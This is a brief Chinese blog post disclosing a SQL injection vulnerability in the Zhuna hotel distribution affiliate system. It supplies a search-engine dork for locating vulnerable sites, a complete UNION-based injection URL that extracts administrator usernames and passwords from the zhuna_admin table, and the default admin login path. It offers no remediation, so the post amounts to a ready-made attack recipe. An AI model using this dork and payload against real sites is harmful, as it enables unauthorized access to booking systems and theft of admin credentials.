住哪网酒店分销联盟系统SQL注入漏洞小鱼技术网小鱼网

发布日期：2011-09.08
发布作者：歌颂

漏洞类型：SQL注入
漏洞描述：住哪网酒店分销联盟系统SQL注入漏洞，直接爆出管理员帐号密码。

Search：inurl:index.php?m=hotelinfo

注入EXP：
http://yunsec.net/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin

默认后台：index.php?m=admin/login

漏洞证明：

声明：本站所有文章，如无特殊说明或标注，均为本站原创发布。任何个人或组织，在未征得本站同意时，禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益，可联系我们进行处理。